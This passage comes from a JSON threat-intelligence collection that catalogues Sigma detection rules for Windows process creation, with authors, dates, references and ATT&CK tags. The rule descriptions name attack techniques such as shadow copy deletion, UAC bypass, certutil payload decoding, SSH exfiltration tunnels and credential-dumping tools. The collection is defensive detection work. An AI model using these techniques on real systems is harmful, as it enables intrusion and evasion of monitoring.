"frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_dosfuscation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", "https://github.com/danielbohannon/Invoke-DOSfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", "value": "Potential Dosfuscation Activity" }, { "description": "Shadow Copies deletion using operating systems utilities", "meta": { "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "creation_date": "2019-10-22", "falsepositive": [ "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "filename": "proc_creation_win_susp_shadow_copies_deletion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", "https://github.com/Neo23x0/Raccine#the-process", "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", "https://redcanary.com/blog/intelligence-insights-october-2021/", "https://blog.talosintelligence.com/2017/05/wannacry.html", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1070", "attack.t1490" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" }, { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", "value": "Shadow Copies Deletion Using Operating Systems Utilities" }, { "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1edff897-9146-48d2-9066-52e8d8f80a2f", "value": "Suspicious Invoke-WebRequest Execution With DirectIP" }, { "description": "Detects renamed Visual Studio Code tunnel execution. 
Attackers can abuse this functionality to establish a C2 channel", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_vscode_tunnel_renamed_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://code.visualstudio.com/docs/remote/tunnels", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2cf29f11-e356-4f61-98c0-1bdb9393d6da", "value": "Renamed Visual Studio Code Tunnel Execution" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"6c96fc76-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher" }, { "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2023-03-05", "falsepositive": [ "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "filename": "proc_creation_win_certutil_certificate_installation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", "value": "New Root Certificate Installed Via Certutil.EXE" }, { "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_tools_masquerading.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml" ], "tags": [ 
"attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "value": "Potential Binary Impersonating Sysinternals Tools" }, { "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_radmin.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", "https://www.radmin.fr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_radmin.yml" ], "tags": [ "attack.execution", "attack.lateral-movement", "attack.t1072" ] }, "related": [ { "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "value": "PUA - Radmin Viewer Utility Execution" }, { "description": "Detects when verclsid.exe is used to run COM object via GUID", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_verclsid_runs_com.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", 
"https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", "value": "Verclsid.exe Runs COM Object" }, { "description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.", "meta": { "author": "frack113", "creation_date": "2021-11-01", "falsepositive": [ "Administrator scripts" ], "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4", "https://adsecurity.org/?p=2604", "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "value": "Change PowerShell Policies to an Insecure Level" }, { "description": "Detect use of the Windows 8.3 short name. 
This could be used as a method to avoid command-line detection", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Applications could use this notation occasionally which might generate some false positives. In that case, investigate the parent and child process." ], "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/jonasLyk/status/1555914501802921984", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "value": "Use NTFS Short Name in Command Line" }, { "description": "Detects the creation of scheduled tasks by user accounts via the \"schtasks\" utility.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Administrative activity", "Software installation" ], "filename": "proc_creation_win_schtasks_creation.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.t1053.005", "attack.s0111", 
"car.2013-08-001", "stp.1u" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", "value": "Scheduled Task Creation Via Schtasks.EXE" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_winsat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", "value": "UAC Bypass Abusing Winsat Path Parsing - Process" }, { "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005" ] }, "related": [ { 
"dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", "value": "Schtasks Creation Or Modification With SYSTEM Privileges" }, { "description": "Detects execution of \"curl.exe\" with the \"-c\" flag in order to save cookie data.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_cookie_hijacking.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml" ], "tags": [ "attack.execution" ] }, "uuid": "5a6e1e16-07de-48d8-8aae-faa766c05e88", "value": "Potential Cookies Session Hijacking" }, { "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ssh_rdp_tunneling.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml" ], "tags": [ "attack.command-and-control", "attack.t1572" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "value": "Potential RDP Tunneling Via SSH" }, { "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems 
since Windows 10 19H1", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dtrace_kernel_dump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", "https://twitter.com/0gtweet/status/1474899714290208777?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "value": "Suspicious Kernel Dump Using Dtrace" }, { "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. 
This can be abused by attackers to decode an encoded payload before execution", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_decode.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/JohnLaTwC/status/835149808817991680", "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_decode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "value": "File Decoded From Base64/Hex Via Certutil.EXE" }, { "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", "meta": { "author": "frack113", "creation_date": "2022-05-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gpresult_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml" ], "tags": [ "attack.discovery", "attack.t1615" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", "value": "Gpresult Display Group Policy Information" }, { "description": "Detects potential PsExec commands that initiate execution on remote systems via common command-line flags used by the utility", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea011323-7045-460b-b2d7-0f7442ea6b38", "value": "Potential PsExec Remote Execution" }, { "description": "Detects use of the .NET InstallUtil.exe application in order to execute an image without logging", "meta": { "author": "frack113", "creation_date": "2022-01-23", "falsepositive": [ 
"Unknown" ], "filename": "proc_creation_win_instalutil_no_log_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", "value": "Suspicious Execution of InstallUtil Without Log" }, { "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content", "https://twitter.com/M_haggis/status/1699056847154725107", "https://twitter.com/JAMESWT_MHT/status/1699042827261391247", "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml" ], "tags": [ "attack.execution", "attack.defense-evasion" ] }, "uuid": "10344bb3-7f65-46c2-b915-2d00d47be5b0", "value": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI" }, { "description": "Detects 
suspicious mshta process execution patterns", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-07-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mshta_susp_pattern.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.echotrail.io/insights/search/mshta.exe", "https://en.wikipedia.org/wiki/HTML_Application", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml" ], "tags": [ "attack.execution", "attack.t1106" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "value": "Suspicious Mshta.EXE Execution Patterns" }, { "description": "Detects the use of Rasautou.exe to load an arbitrary DLL specified in the -d option and execute the export specified in the -p option.", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/fireeye/DueDLLigence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", "value": "DLL Execution via Rasautou.exe" }, { "description": "Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.\nSharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharp_dpapi_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/SharpDPAPI", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_dpapi_execution.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1134.001", "attack.t1134.003" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7d33b50-f690-4b51-8cfb-0fb912a31e57", "value": "HackTool - SharpDPAPI Execution" }, { "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-26", "falsepositive": [ "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. 
Remove or add processes accordingly" ], "filename": "proc_creation_win_vscode_child_processes_anomalies.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1618021415852335105", "https://twitter.com/nas_bench/status/1618021838407495681", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a3164f2-b373-4152-93cf-090b13c12d27", "value": "Potentially Suspicious Child Process Of VsCode" }, { "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_selectmyparent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1134.004" ] }, "related": [ { "dest-uuid": "93591901-3172-4e94-abf8-6034ab26f44a", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", "value": "HackTool - PPID Spoofing SelectMyParent Tool Execution" }, { "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", "meta": { "author": "frack113", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "proc_creation_win_powershell_frombase64string_archive.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml" ], "tags": [ "attack.command-and-control", "attack.t1132.001" ] }, "related": [ { "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "value": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation" }, { "description": "Detects changes to environment variables related to ETW logging via the CommandLine.\nThis could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_etw_modification_cmdline.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", 
